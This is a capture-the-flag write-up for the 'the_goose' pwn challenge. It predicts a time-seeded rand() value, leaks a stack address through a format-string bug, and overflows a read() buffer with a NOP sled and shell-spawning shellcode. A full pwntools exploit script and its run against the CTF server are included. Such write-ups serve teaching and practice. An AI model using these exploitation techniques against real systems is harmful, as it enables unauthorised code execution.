description: When the honking gets tough, you better brush up on your basics. Author: dsp
For this challenge we are given the binary and the Dockerfile
>>> pwn checksec --file=chall <<<
[*] 'l3ak_ctf/pwn/the_goose/chall'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: PIE enabled
Stack: Executable
RWX: Has RWX segments
Stripped: No
No stack canary and executable stack we can already guess this will involve a shellcode.
Exploration Link to heading
>>> the_goose ./chall
Welcome to the goose game.
Here you have to guess a-priori, how many HONKS you will receive from a very angry goose.
Godspeed.
How shall we call you?
> GOD
so GOD. how many honks?10
HONK ... HONK
tough luck. THE GOOSE WINS! GET THE HONK OUT!
So it seems like we have to guess the number of HONKs from the goose.
Let’s fire up ghidra and look at what we facing.
int main(void)
{
int iVar1;
time_t tVar2;
setvbuf(stdout,(char *)0x0,2,0);
tVar2 = time((time_t *)0x0);
srand((uint)tVar2);
setuser();
iVar1 = rand();
nhonks = iVar1 % 0x5b + 10;
iVar1 = guess();
if (iVar1 == 0) {
puts("tough luck. THE GOOSE WINS! GET THE HONK OUT!");
}
else {
highscore();
}
return 0;
}
The number of honks are generated by rand() which is seeded with the current time.
If we correctly guess the number of honks we go inside of the highscore function.
void highscore(void)
{
undefined message_buffer [128];
char buffer_random [31];
undefined local_d9;
undefined name_buffer [32];
char success_message [74];
/* The message is written one char at a time I placed everything on the same line to make it readable */
success_message = "wow %s you\'re so go what message would you like to leave to the world?"
success_message[0x49] = '\0';
printf("what\'s your name again?");
scanf("%31s",name_buffer);
local_d9 = 0;
sprintf(buffer_random,success_message,name_buffer);
printf(buffer_random);
read(0,message_buffer,0x400);
printf("got it. bye now.");
return;
}
The highscore function has a really obvious buffer overflow on the call to read that would allow us to inject shellcode and jump to it.
So there are two steps to this challenge :
- Guessing the number of honks
- Exploiting the
highscorefunction to get a shell
Guessing the number of honks Link to heading
The random number generator is initialised using srand(time(NULL)) which makes the seed the second of the call to srand.
We also know how the number of honks is calculated (nhonks = iVar1 % 0x5b + 10;).
From there we can easily compute the number with a small C program
#include <stdlib.h>
#include <stdio.h>
#include <time.h>
int main(void)
{
srand(time(NULL));
printf("%d", (rand() % 0x5b + 10));
return 0;
}
After compiling we can call it from a pwntools script and correctly guess the number of honks (if you are on a slow link you can add 1 or 2 to the srand time).
number = subprocess.run(["./predict"], capture_output=True).stdout
io.sendlineafter(b"> ", b"GOD")
io.sendlineafter(b'so GOD. how many honks?', number)
Exploiting the highscore function Link to heading
Using the buffer overflow on the read call we can easily place a shellcode on the stack (there is no NX).
The only problem is finding the address of something on the stack to be able to jump to our shellcode.
This can be done using the format string vulnerability when we are asked for our name again. Giving %p as the name we are able to leak a pointer to the stack.
The last step is to calculate the offsets and finish writing the exploit scrip
Putting it all together Link to heading
io = start()
number = subprocess.run(["./predict"], capture_output=True).stdout
io.sendlineafter(b"> ", b"GOD")
io.sendlineafter(b'so GOD. how many honks?', number)
io.sendlineafter(b"what's your name again?", b'%p')
stack = int(io.recv().decode().split()[1], 16)
stack -= 0x126 # Offset to our buffer
# Space before return pointer 376
sh = asm(shellcraft.amd64.linux.sh())
payload = flat(
asm('nop')*100,
sh,
b'A'*(376-100-len(sh)),
pack(stack)
)
io.sendline(payload)
io.interactive()
We run it and there we go
>>> ./exploit.py REMOTE 34.45.81.67 16004 <<<
[+] Opening connection to 34.45.81.67 on port 16004: Done
[*] Switching to interactive mode
got it. bye now.$ cat /flag.txt
L3AK{H0nk_m3_t0_th3_3nd_0f_l0v3}
[*] Interrupted
[*] Closed connection to 34.45.81.67 port 16004